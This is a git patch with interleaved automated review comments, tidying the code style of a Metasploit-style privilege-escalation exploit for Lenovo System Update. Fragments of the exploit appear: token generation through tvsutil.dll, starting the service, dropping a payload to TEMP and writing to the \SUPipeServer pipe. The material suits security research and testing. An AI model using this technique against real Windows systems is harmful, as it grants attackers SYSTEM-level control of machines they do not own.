From 3aa1ffb4f5cd958801a3229f890b15b0ea983bb0 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Fri, 22 May 2015 16:20:36 -0500
Subject: [PATCH] Do minor code cleanup
---
 .../windows/local/lenovo_systemupdate.rb | 52 +++++++++----------
 1 file changed, 26 insertions(+), 26 deletions(-)
diff --git a/modules/exploits/windows/local/lenovo_systemupdate.rb b/modules/exploits/windows/local/lenovo_systemupdate.rb
index 2cf93270f4..732c7deb5e 100644
--- a/modules/exploits/windows/local/lenovo_systemupdate.rb
+++ b/modules/exploits/windows/local/lenovo_systemupdate.rb
@@ -4,32 +4,31 @@
 ##
 class Metasploit3 < Msf::Exploit::Local
- Rank = ExcellentRanking
-
 include Msf::Exploit::EXE
 include Msf::Post::File
 include Msf::Exploit::FileDropper
 include Msf::Post::Windows::Priv
 include Msf::Post::Windows::Services
+ Rank = ExcellentRanking
+
 def initialize(info={})
 super(update_info(info, {
 'Name' => 'Lenovo System Update Privilege Escalation',
 'Description' => %q{
- The named pipe, \SUPipeServer, can be accessed by normal users to interact
- with the System update service. The service provides the possibility to execute
- arbitrary commands as SYSTEM if a valid security token is provided. This token can
- be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
-
- Please note that the System Update is stopped by default but can be started/stopped calling
- the Executable ConfigService.exe
+ The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
+ System update service. The service provides the possibility to execute arbitrary
+ commands as SYSTEM if a valid security token is provided. This token can be generated
+ by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
+ System Update is stopped by default but can be started/stopped calling the Executable
+ ConfigService.exe.
 },
 'License' => MSF_LICENSE,
 'Author' =>
 [
- 'Micahel Milvich', # vulnerability discovery, advisory
- 'Sofiane Talmat', # vulnerability discovery, advisory
- 'h0ng10' # Metasploit module
+ 'Micahel Milvich', # vulnerability discovery, advisory
+ 'Sofiane Talmat', # vulnerability discovery, advisory
+ 'h0ng10' # Metasploit module
 ],
 'Arch' => ARCH_X86,
 'Platform' => 'win',
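Review bot: The first entry of the `'Author'` array still reads `'Micahel Milvich'`, which looks like a transposition of "Michael"; this commit already touches that line to realign its comment, so the spelling could be corrected in the same pass once it is confirmed against the advisory credit. In the rewritten description, `Please, note that` carries a stray comma, and "can be started/stopped calling the Executable" would read better as `can be started/stopped by calling the executable`. The `initialize` call continues outside the hunk.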
@@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
 def get_security_token(lenovo_directory)
- if not client.railgun.get_dll('tvsutil') then
+ unless client.railgun.get_dll('tvsutil')
 client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
- client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
+ client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
 end
 dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
- return dll_response['systeminfo'][0,40]
+
+ dll_response['systeminfo'][0,40]
 end
@@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
 end
 su_directory = service_info('SUService')[:path][1..-16]
- print_status("Starting service via ConfigService.exe")
- config_service(su_directory, "start")
- print_status("Giving the service some time to start...")
- sleep(datastore['sleep'])
+ print_status('Starting service via ConfigService.exe')
+ config_service(su_directory, 'start')
+
+ print_status('Giving the service some time to start...')
+ Rex.sleep(datastore['Sleep'])
 print_status("Getting security token...")
 token = get_security_token(su_directory)
 vprint_good("Security token is: #{token}")
-
- if datastore['WritableDir'] and not datastore['WritableDir'].empty?
- temp_dir = datastore['WritableDir']
- else
+ if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
 temp_dir = get_env('TEMP')
+ else
+ temp_dir = datastore['WritableDir']
 end
- print_status("Using #{temp_dir} to drop malicious exe")
+ print_status("Using #{temp_dir} to drop the payload")
 begin
 cd(temp_dir)
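Review bot: In the new `add_function` call the trailing arguments are still written as `windows_name = nil, calling_conv = 'cdecl'`, which in Ruby are local-variable assignments evaluated in argument position, not keyword arguments. The values are passed positionally and two unused locals are left behind in `get_security_token`. Writing the tail as `[['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')` passes the same values without suggesting named parameters. The literals `256` and `40` would also benefit from a one-line comment stating which buffer size and token length they represent, and `[0,40]` from a space after the comma to match the rest of the cleanup.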
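Review bot: `Rex.sleep(datastore['Sleep'])` changes the case of the option key from `'sleep'` in a commit described as cleanup, and the `register_options` entry that defines the option is not in any hunk shown, so the registered name should be checked to match. In the same block `print_status("Getting security token...")` keeps double quotes although it has no interpolation and its neighbours were converted to single quotes. The condition `datastore['WritableDir'].nil? || datastore['WritableDir'].empty?` reads the datastore twice; `datastore['WritableDir'].to_s.empty?` gives the same result for a string or nil. The enclosing method starts and ends outside the hunk.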
@@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
 fail_with(Failure::Unknown, 'Failed to write to pipe')
 end
- print_status("Stopping service via ConfigService.exe")
- config_service(su_directory, "stop")
+ print_status('Stopping service via ConfigService.exe')
+ config_service(su_directory, 'stop')
 end
 end